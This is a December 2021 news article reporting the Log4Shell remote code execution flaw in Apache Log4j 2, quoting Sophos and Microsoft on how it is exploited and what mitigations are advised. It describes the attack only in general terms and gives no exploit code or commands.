Business, News, Security

Log4Shell arrives just in time to ruin the holidays

Brendyn Lotz

13th December 2021

The security community has been a buzz all weekend over the discovery of a remote code execution vulnerability in Apache Log4j 2 called Log4Shell.

The vulnerability exploits how data is written to a server’s logfile. As Sophos explains, an attacker could trick the server into downloading a malicious payload by feeding the logfile a Java programme which it assumes needs to be run in order to generate the file.

“The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups,” explains Sophos.

Essentially, a clever bit of trickery could see Log4j interpret a message as a URL, fetch that URL and execute a payload if one exists without encountering a problem.

Why does this feature exist? Well for one it allows you to log in using an email or a username rather than an incoherent string of text and numbers.

The problem is that this vulnerability could allow an attacker to access a server without the need for a password or access token.

The big problem here is that Log4Shell has already been detailed and this was done before a patch could be sent out.

“At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” Microsoft Threat Intelligence Center wrote in a blog post.

This is a very big issue and the advice for now is to upgrade to Apache Log4j 2.15.0 and block JNDI from making requests to untrusted servers. For end users, there’s not much you can do besides wait for a fix.

Microsoft also states that firms shouldn’t focus solely on blocking requests as given how long this vulnerability has been in the wild, it’s likely that a breach has already taken place.

“Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections,” says Microsoft.

Our hearts go out to the security teams which need to address this matter after a long year fighting ne’er-do-wells online.

[Image – CC 0 Pixabay]

About Author

Brendyn Lotz

Brendyn Lotz writes news, reviews, and opinion pieces for Hypertext. His interests include SMEs, innovation on the African continent, cybersecurity, blockchain, games, geek culture and YouTube.